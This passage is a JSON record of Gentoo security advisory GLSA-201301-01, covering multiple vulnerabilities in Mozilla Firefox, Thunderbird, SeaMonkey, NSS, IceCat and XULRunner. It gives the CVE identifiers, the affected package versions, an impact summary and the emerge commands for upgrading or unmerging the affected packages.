"http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777", "https://bugs.gentoo.org/show_bug.cgi?id=277752", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204", "https://bugs.gentoo.org/show_bug.cgi?id=246602", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.14", "packageFilename": "UNKNOWN", "packageName": "www-client/seamonkey-bin", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "www-client/firefox", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "mail-client/thunderbird-bin", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.0", "packageFilename": "UNKNOWN", "packageName": "mail-client/mozilla-thunderbird-bin", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.5.6", "packageFilename": "UNKNOWN", "packageName": "www-client/mozilla-firefox-bin", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0-r1", "packageFilename": "UNKNOWN", "packageName": "www-client/icecat", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.6.8", "packageFilename": "UNKNOWN", "packageName": "www-client/mozilla-firefox", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.0.4-r1", "packageFilename": "UNKNOWN", "packageName": "mail-client/mozilla-thunderbird", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.8.1.19", "packageFilename": "UNKNOWN", "packageName": "net-libs/xulrunner-bin", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.14", "packageFilename": "UNKNOWN", "packageName": "dev-libs/nss", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.0-r1", "packageFilename": "UNKNOWN", "packageName": "net-libs/xulrunner", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.14-r1", "packageFilename": "UNKNOWN", "packageName": "www-client/seamonkey", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "mail-client/thunderbird", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "www-client/firefox-bin", "arch": "all", "operator": "lt"}], "description": "### Background\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the \u2018Mozilla Application Suite\u2019. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla\u2019s Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL\u2019s for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser\u2019s font, conduct clickjacking attacks, or have other unspecified impact. \n\nA local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nAll users of the Mozilla Firefox binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nAll users of the Mozilla Thunderbird binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.14-r1\"\n \n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.14\"\n \n\nAll NSS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/nss-3.14\"\n \n\nThe \u201cwww-client/mozilla-firefox\u201d package has been merged into the \u201cwww-client/firefox\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox\u201d and then emerge the latest \u201cwww-client/firefox\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nThe \u201cwww-client/mozilla-firefox-bin\u201d package has been merged into the \u201cwww-client/firefox-bin\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox-bin\u201d and then emerge the latest \u201cwww-client/firefox-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird\u201d package has been merged into the \u201cmail-client/thunderbird\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird\u201d and then emerge the latest \u201cmail-client/thunderbird\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird-bin\u201d package has been merged into the \u201cmail-client/thunderbird-bin\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird-bin\u201d and then emerge the latest \u201cmail-client/thunderbird-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nGentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: \n \n \n # emerge --unmerge \"www-client/icecat\"\n \n\nGentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner\"\n \n\nGentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner-bin\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2013-01-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "gentoo", "title": "Mozilla Products: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "modified": "2013-01-08T00:00:00", "id": "GLSA-201301-01", "href": "https://security.gentoo.org/glsa/201301-01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}